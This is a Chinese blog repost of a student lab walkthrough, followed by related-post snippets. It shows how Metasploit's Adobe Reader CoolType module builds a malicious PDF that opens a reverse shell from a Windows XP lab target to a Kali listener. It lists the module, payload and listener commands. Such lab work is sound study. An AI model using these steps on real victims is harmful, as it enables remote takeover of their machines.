Adobe阅读器渗透攻击

最新推荐文章于 2024-09-13 17:25:49 发布
最新推荐文章于 2024-09-13 17:25:49 发布
阅读量156 收藏 1
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/20145201lzx/p/6695141.html
版权

Adobe阅读器渗透攻击

  • 和之前一样kali攻击机和winxp靶机要ping通(真心是通的..不再重复了);

  • 由于之后生成的pdf在隐藏文件夹下,故在kali下打开显示隐藏文件,如下图:
    886975-20170411200626719-1738958202.png

  • kali开启msfconsole;

  • use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 用命令set payload windows/shell_reverse_tcp和之前一样设置参数;
    和之前唯一不同的是,用命令set FILENAME 20145201.pdf来设置生成pdf的文件名

886975-20170411200912376-816399856.png

  • 用命令exploit,生成pdf文件,根据显示的位置找到pdf文件,并复制到靶机里;
    886975-20170411201141438-377729196.png

  • 用命令back退出当前模块,并用命令use exploit/multi/handler建立一个监听模块,参数设置要和之前的一样;
    886975-20170411201343094-203275539.png
    886975-20170411201444110-1772217466.png

  • exploit后,在xp中打开pdf,结果如下:
    886975-20170411201549313-1229505200.png
    可以看到已经获取的靶机权限,20145201.pdf的文件是存在的~

  • 在靶机中用命令netstat -an,可以看到kali攻击机和靶机之间是有tcp连接的。
    886975-20170411201828922-549111479.png

转载于:https://www.cnblogs.com/20145201lzx/p/6695141.html

weixin_30561177
关注
【愚公系列】2023年05月 网络安全高级班 079.Kali Linux&Metasploit渗透测试(Metasploit漏洞利用阶段)
时光隧道
05-31 7708
Metasploit实战通常可以分为三个阶段:信息搜集、漏洞利用和提权。信息搜集阶段:在这个阶段中,渗透测试人员需要利用各种可用的信息收集工具和技术收集目标系统的关键信息。这些信息可能包括目标系统的IP地址、端口、网络拓扑、服务和应用程序版本信息、操作系统、Web应用程序框架等等。漏洞利用阶段:在这个阶段中,渗透测试人员使用已知的或自己发现的漏洞来攻击目标系统。渗透测试人员使用Metasploit框架来执行攻击,并尝试获得对目标系统的访问权限。这个阶段中还可能包括密码破解和社会工程学等攻击技术。
渗透测试
yes_angel的博客
06-25 2539
渗透测试工具 网络扫描工具、通用漏洞检测、应用漏洞检测三类 网络扫描工具 1.  系统自带工具: 2. NMap 3. SuperScan 4. Wireshark:通常被用于嗅探局域网内的数据传输格式,探查是否存在明文传输口令、数据传输风险等 通用漏洞扫描工具 通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-08-067、MS-12
Adobe阅读器渗透攻击实战案例
Goallegoal的博客
05-02 554
Adobe阅读器渗透攻击实战案例 低版本的adobe reader 9.0版本会出现溢出攻击
Adobe阅读器渗透实战
自学编程_youkewang.top
03-05 825
0x00:实验的漏洞:CVE-2010-2883 针对的软件版本:Adobe阅读器的8.2.4 到 9.3.4之间的版本.   0x01:首先我们使用msfconsole进入MSF界面,然后通过Search命令查找相应的exploit攻击模块,设置攻击载荷,显示设置选项如图1-1.   图1-1. 0x02:设置options中的内容,第一条命令是设置生成的恶意pdf文件的名称,第二
Metasploits之Adobe阅读器漏洞
weixin_30379911的博客
07-27 209
实验环境:Kali 2.0+Windows XP+Adobe Reader 9.3.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。 msfconsole 启动Metasploits search cooltype_sing 搜索Adobe阅读器漏洞(ado...
Adobe漏洞攻击
weixin_30466953的博客
04-11 217
首先,ping通两台主机 打开msf,进入漏洞模块 设定攻击载荷 查看所需参数 设定所需参数 生成pdf文件 此处,由于文件生成在隐藏文件夹中,所以先设置隐藏文件夹可见,再复制文件至靶机 建立监听模块 依然设置相关参数 靶机打开pdf文件,成功连接 转载于:https://www.cnblogs.com/entropy/p/6693120.html...
20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击
dgflxcwno867930904的博客
04-16 192
两台虚拟机: kali ip:192.168.96.130 windows xp sp3 ip:192.168.96.133 1.kali下打开显示隐藏文件 2.在kali终端中开启msfconsole。 3.进入该漏洞模块并设置攻击有效载荷 4.查看需要需要设置的数据,并设置相应的参数 5.查看设置的参数信息 6.打开exploit生成渗透攻击的pdf文件 7.将渗透文件发送...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 1953
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
渗透测试-pdf文件上传-XSS
热门推荐
cdyunaq的博客
01-06 1万+
前言 pdf是portable document format的缩写,是目前广泛应用于各种场合的文件格式,其是由Adobe公司根据Postscript语言修改后提出的文件标准,并且被ISO组织接受,目前已经发展到2.0版本(ISO32000-2)。 目前广泛使用的是1.7版本,该版本pdf功能已经相当丰富,可以显示3D模型,播放多媒体音视频,执行Javascript脚本等功能。 PDF中的JavaScript利用 Pdf文件是应用广泛的一种文件格式,很多针对Adobe阅读器的CVE漏洞都是通过pdf
20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击
weixin_30412577的博客
04-12 139
20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象为:windows xp sp3 / Adobe 9.3 主机为kali的ip地址为:192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137 实验步骤 使用命令msfconsole进入...
客户端渗透之——基于PDF文件格式的渗透攻击
冰河的专栏
01-24 2654
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633022 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 漏洞程序: Adobe Reader 9.0 1.生成PDF文件 msfconsole use exploit/windows/fileformat/ad...
如何在DPDK中实现协议解析?
Do my best!
09-10 656
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
WireShark分析localhost包
ngczx的博客
09-11 583
WireShark分析localhost包
​数据链路层——流量控制&可靠传输机制 ​
qq_25467441的博客
09-09 751
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 880
Linux中最强权限维持rootkit
iptables实现内外网ip转换
最新发布
m0_67475830的博客
09-13 290
准备三台虚拟机。
Mahout实战指南:音频视频需Adobe阅读器
此外,书中还包含了音频和视频链接,这些资源通常需要Adobe Acrobat Reader来访问,以便读者能够获得更丰富的学习体验。 《Mahout in Action》的封面信息可能包含了诸如“数据科学入门”、“Hadoop技术揭秘”或“大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值